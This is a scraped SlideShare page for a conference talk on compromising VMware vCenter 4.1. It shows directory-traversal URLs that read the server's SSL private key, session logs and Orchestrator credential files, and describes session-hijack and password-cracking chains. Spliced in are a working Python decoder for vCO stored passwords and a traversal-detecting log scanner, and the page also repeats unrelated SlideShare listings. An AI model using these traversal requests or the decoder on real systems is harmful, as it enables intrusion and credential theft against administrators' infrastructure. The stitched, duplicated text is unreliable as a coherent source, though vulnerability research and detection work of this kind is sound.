How to hack VMware vCenter server in 60 seconds
Alexey Sintsov
Alexander Minozhenko
Hijacking VMware

@asintsov @al3xmin

• Pen-testers at Digital Security
• Researchers
• DCG#7812 / Zeronights
• FUN, FUN, FUN

© 2002—2012, Digital Security

Our target




VMware vCenter Server

• VMware vCenter Server is a solution for managing VMware vSphere
• vSphere is the virtualization operating system

Pen-test…

• VMware vCenter version 4.1 update 1

Services:
   • Update Manager
   • vCenter Orchestrator
   • Chargeback
   • Other

• Most of those services have a web server

VASTO and CVE-2009-1523

• Directory traversal in the Jetty web server
  http://target:9084/vci/download/health.xml/%3f/../../../../FILE
• Discovered by Claudio Criscione

• Fixed in VMware Update Manager 4.1 update 1 :(

• Who wants to pay me for a 0day?
• A pentester is not a researcher?

8(




CVE-2010-1870

• VMware vCenter Orchestrator uses Struts2 version 2.11 (discovered by Digital Defense, Inc.)
• CVE-2010-1870: Struts2/XWork remote command execution, discovered by Meder Kydyraliev
• Fixed in 4.2

Details

• Struts2 does not properly escape “#”
• Can be bypassed with the Unicode escape “\u0023”
• 2 variables need to be set for RCE:
• #_memberAccess['allowStaticMethodAccess']
• #context['xwork.MethodAccessor.denyMethodExecution']

But what about us?

• Directory traversal in the Jetty web server … AGAIN!
  http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..FILE.EXT
• Metasploit module vmware_update_manager_traversal.rb by sinn3r

• We can read any file! But what

• Claudio Criscione proposed reading vpxd-profiler-*:
  /SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680-FB72656A1DCB'/Username='FakeDomain\FakeUser'/SoapSession/Id='AD45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1
  Sorry, patched in 4.1!

• Contains logs of SOAP requests with session IDs!!!
  Discovered by Alexey Sintsov 8)

Attack #1

• Read vpxd-profiler via traversal…
• Get admins' IP addresses from it…
• Read the secret SSL key
  http://target:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
• ARP-SPOOF with the SSL key - PROFIT

VMware vCenter Orchestrator

• VMware vCO is software for automating configuration and management
• Installed by default with vCenter
• Has an interesting file:
  C:\Program files\VMware\Infrastructure\Orchestrator\configuration\jetty\etc\passwd.properties

VMware vCenter Orchestrator
Password disclosure

Read hash -> crack MD5 -> log on to Orchestrator -> get vCenter pass

VMware vCenter Orchestrator – more stuff

• vCO stores passwords in these files:
  C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\plugins\VC.xml
  C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\vmo.properties

  <virtual-infrastructure-host>
      <enabled>true</enabled>
      <url>https://new-virtual-center-host:443/sdk</url>
      <administrator-username>vmware</administrator-username>
      <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
      <pattern>%u</pattern>
  </virtual-infrastructure-host>

Hmmm….

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b
        vmware

00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
        vcenter

• Red bytes look like the length
• Green bytes are in the ASCII range
• Black bytes are random

Discovered by Alexey Sintsov and Alexander Minozhenko
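
A known-plaintext check on the two blobs above, added here as an example (not the authors' code), showing why the red/green/black layout means obfuscation rather than encryption. It assumes the first hex digit of each 67-digit slide string is a prefix to skip, reads the next byte as the length (red), the following bytes as the transformed password (green) and the rest as filler (black); the per-position offset it derives from the slide's own plaintexts is 0, 1, 2, ..., and recover() generalizes that observation to any blob with the same layout.

```python
"""Known-plaintext check of the two vCO credential blobs shown on the slide.

Added example for this write-up, not the authors' code. Assumptions: each slide
string has 67 hex digits, so the first digit is skipped as a prefix and the
remaining 66 are parsed as 33 bytes; byte 0 is the length (the slide's red
byte), the next `length` bytes are the transformed password (green, ASCII
range) and whatever follows is filler (black).
"""
from dataclasses import dataclass

# The two blobs and their plaintexts exactly as printed on the slide.
BLOB_VMWARE = "006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b"
BLOB_VCENTER = "00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079"
SLIDE_SAMPLES = {BLOB_VMWARE: "vmware", BLOB_VCENTER: "vcenter"}


@dataclass
class BlobLayout:
    length: int      # red byte
    payload: bytes   # green bytes: `length` bytes following the length byte
    filler: bytes    # black bytes: everything after the payload


def parse_blob(hex_blob):
    """Split a blob into the three regions the slide colours."""
    if len(hex_blob) % 2:
        hex_blob = hex_blob[1:]  # assumption: odd-length slide string, drop prefix digit
    raw = bytes.fromhex(hex_blob)
    length = raw[0]
    if 1 + length > len(raw):
        raise ValueError("length byte exceeds blob size")
    return BlobLayout(length, raw[1:1 + length], raw[1 + length:])


def is_printable_ascii(data):
    """True when every byte is printable ASCII, i.e. the 'green' property."""
    return all(0x20 <= b < 0x7F for b in data)


def position_offsets(hex_blob, plaintext):
    """payload[i] - plaintext[i] for each position. A fixed, key-independent
    pattern here means the transform is reversible without any secret."""
    layout = parse_blob(hex_blob)
    if layout.length != len(plaintext):
        raise ValueError("length byte does not match the known plaintext")
    return [b - p for b, p in zip(layout.payload, plaintext.encode())]


def recover(hex_blob):
    """Undo the transform both slide samples exhibit: payload[i] = pt[i] + i.
    This generalises the slide's observation to any blob with the same layout."""
    layout = parse_blob(hex_blob)
    return bytes((b - i) & 0xFF for i, b in enumerate(layout.payload)).decode("latin-1")


if __name__ == "__main__":
    for blob, plaintext in SLIDE_SAMPLES.items():
        layout = parse_blob(blob)
        print(f"length={layout.length} ascii={is_printable_ascii(layout.payload)} "
              f"offsets={position_offsets(blob, plaintext)} recovered={recover(blob)!r}")
```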

0day still not patched 8)




gg and bb

a.sintsov@dsec.ru
@asintsov

a.minozhenko@dsec.ru
@al3xmin

Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsAndrey Dotsenko
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsHyundai Motor Group
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 

Recently uploaded (20)

E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 

How to hack VMware vCenter server in 60 seconds

  • 10. But what about us?
    • Directory traversal in Jetty web server … AGAIN!
      http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..FILE.EXT
    • Metasploit module vmware_update_manager_traversal.rb by sinn3r
    • We can read any file! But what did Claudio Criscione propose to read?
      vpxd-profiler-*:
      /SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680-FB72656A1DCB'/Username='FakeDomain\FakeUser'/SoapSession/Id='AD45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1
      Sorry, patched in 4.1!
      Contains logs of SOAP requests with session ID!!!
      Discovered by Alexey Sintsov 8)
  • 11. Attack #1
    • Read vpxd-profiler via traversal…
    • Get Admin's IP addresses from it…
    • Read secret SSL key
      http://target:9084/vci/downloads/...............\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
    • ARP-SPOOF with SSL key - PROFIT
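On the defender's side, an added example that is not part of the deck: a small access-log scanner that flags the two traversal shapes shown on these slides (the health.xml/%3f trick from CVE-2009-1523 and the %5C-encoded backslash walk) and any request that reaches the files the deck names (vpxd-profiler logs, rui.key, the vCO credential files). The log lines and the file name vpxd-profiler-1.log are constructed.

```python
import re
from urllib.parse import unquote

# Files the deck shows being pulled through the traversal.
SENSITIVE_NAMES = ("vpxd-profiler", "rui.key", "passwd.properties",
                   "vc.xml", "vmo.properties")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def normalize_path(raw: str) -> str:
    # Percent-decode until stable (catches %5C and double encoding), then
    # treat backslashes as separators so '..\' reads as '../'.
    path = raw
    for _ in range(3):                      # bounded so odd input cannot loop
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def classify(raw_path: str) -> tuple:
    # Reasons a request deserves an alert; empty tuple means benign.
    path = normalize_path(raw_path)
    reasons = []
    # Both shapes in the deck leave a '..' segment once decoded:
    # health.xml/%3f/../../ (CVE-2009-1523) and .%5C..%5C.. (the %5C variant).
    if ".." in path.split("/"):
        reasons.append("traversal")
    if any(name in path.lower() for name in SENSITIVE_NAMES):
        reasons.append("sensitive-file")
    return tuple(reasons)

def scan_log(text: str) -> list:
    # (line_number, reasons, decoded_path) for every flagged request line.
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if match and (reasons := classify(match.group(1))):
            findings.append((number, reasons, normalize_path(match.group(1))))
    return findings

# Constructed access-log lines (not real traffic): a normal request, the two
# traversal shapes from the deck, a double-encoded request for rui.key, a 404.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:00:00 +0000] "GET /vci/download/health.xml HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2012:10:00:01 +0000] "GET /vci/download/health.xml/%3f/../../../../FILE.EXT HTTP/1.1" 200 213
10.0.0.9 - - [01/Jan/2012:10:00:02 +0000] "GET /vci/download/.%5C..%5C..%5C..%5C..vpxd-profiler-1.log HTTP/1.1" 200 99811
10.0.0.9 - - [01/Jan/2012:10:00:03 +0000] "GET /vci/downloads/%252e%252e%255c%252e%252e%255cSSL%255crui.key HTTP/1.1" 200 1679
10.0.0.7 - - [01/Jan/2012:10:00:04 +0000] "GET /vci/download/index.xml HTTP/1.1" 404 0
"""
```

Running scan_log(SAMPLE_LOG) flags lines 2, 3 and 4; a 200 status on a flagged line is the signal that the traversal actually returned the file.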
  • 12. VMware vCenter Orchestrator
    • VMware vCO: software to automate configuration and management
    • Installed by default with vCenter
    • Has an interesting file: C:\Program Files\VMware\Infrastructure\Orchestrator\configuration\jetty\etc\passwd.properties
  • 13. VMware vCenter Orchestrator: Password disclosure
    Read hash -> crack MD5 -> log in to Orchestrator -> get vCenter password
  • 14. VMware vCenter Orchestrator: more stuff
    • vCO stores passwords in these files:
      • C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\plugins\VC.xml
      • C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\vmo.properties
      <virtual-infrastructure-host>
        <enabled>true</enabled>
        <url>https://new-virtual-center-host:443/sdk</url>
        <administrator-username>vmware</administrator-username>
        <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
        <pattern>%u</pattern>
      </virtual-infrastructure-host>
  • 15. Hmmm….
    006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b  vmware
    00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079  vcenter
    • Red bytes look like length
    • Green bytes in ASCII range
    • Black bytes random
    Discovered by Alexey Sintsov and Alexander Minozhenko
  • 16. 0day still not patched 8)
  • 17. gg and bb
    a.sintsov@dsec.ru @asintsov
    a.minozhenko@dsec.ru @al3xmin